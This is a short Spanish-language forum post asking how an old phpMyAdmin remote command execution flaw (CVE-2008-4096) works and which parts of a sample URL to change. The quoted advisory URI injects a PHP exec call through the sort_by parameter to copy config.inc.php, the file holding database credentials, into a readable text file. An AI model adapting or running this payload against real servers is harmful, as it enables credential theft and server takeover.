Muy buenas.
Les escribo para preguntar si alguno sería tan amable de explicarme como funciona esta vulnerabilidad en el phpmyadmin versión 2.9.1.1
El código es el siguiente:
phpMyAdmin 'server_databases.php' Remote Command Execution Vulnerability
Class: Input Validation Error
CVE: CVE-2008-4096
CVE-2008-3197
Remote: Yes
Local: No
The following example URI is available:
http://www.example.com/server_databases.ph...;sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
El problema es que no se que parametros cambiar en esa url de prueba, lo único evidente es lo de example.com, cambiarlo por la direccion del phpmyadmin en cuestión, pero nada más...
Muchas gracias a todos de antemano.